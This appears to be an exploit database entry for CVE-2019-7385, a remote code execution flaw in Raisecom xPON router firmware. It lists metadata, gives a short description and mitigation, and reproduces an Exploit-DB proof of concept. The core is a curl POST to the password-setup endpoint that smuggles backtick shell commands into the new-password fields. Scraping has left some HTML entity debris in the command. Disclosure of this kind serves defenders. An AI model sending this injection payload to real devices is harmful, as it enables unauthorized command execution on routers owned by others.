Remote code execution in Raisecom xpon

vendor:

xpon

by:

JameelNabbo

7.8

CVSS

HIGH

Remote Code Execution

CWE

Product Name: xpon

Affected Version From: ISCOMHT803G-U_2.0.0_140521_R4.1.47.002

Affected Version To: ISCOMHT803G-U_2.0.0_140521_R4.1.47.002

Patch Exists: NO

Related CWE: CVE-2019-7385

CPE: o:raisecom:xpon:ISCOMHT803G-U_2.0.0_140521_R4.1.47.002

Metasploit:

Other Scripts:

Platforms Tested: MacOSX

2019

Remote code execution in Raisecom xpon

This exploit allows remote attackers to execute arbitrary code on the Raisecom xpon device. By sending a specially crafted POST request to the /boaform/formPasswordSetup endpoint, an attacker can change the device's password and execute the 'reboot' command. This vulnerability has been assigned CVE-2019-7385.

Mitigation:

To mitigate this vulnerability, it is recommended to update the Raisecom xpon device to a patched version that fixes the issue.

Source

Exploit-DB raw data:

# Exploit Title: Remote code execution in Raisecom xpon
# Date: 03/03/2019
# Exploit Author: JameelNabbo
# Website: Ordina.nl
# Vendor Homepage: https://www.raisecom.com
# Software Link: https://www.raisecom.com/products/xpon
# Version: ISCOMHT803G-U_2.0.0_140521_R4.1.47.002
# Tested on: MacOSX
# CVE-2019-7385

POC:
curl -i -s -k -X 'POST' \
-H 'Origin: http://127.0.0.1&apos; -H -H 'Content-Type:
application/x-www-form-urlencoded' -H 'User-Agent: Chrome/7.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML,
like Gecko) Chrome/65.0.3325.181 Safari/537.36' -H 'Referer: http://192.168.1.1/password.asp&apos; \
--data-binary
$'userMode=0&oldpass=netstat&newpass=`reboot`&confpass=`reboot`&submit-url=%2Fpassword.asp&save=Apply+Changes&csrf_token=current_cCSRF_ToKEN'
\
'http://192.168.1.1/boaform/formPasswordSetup&apos;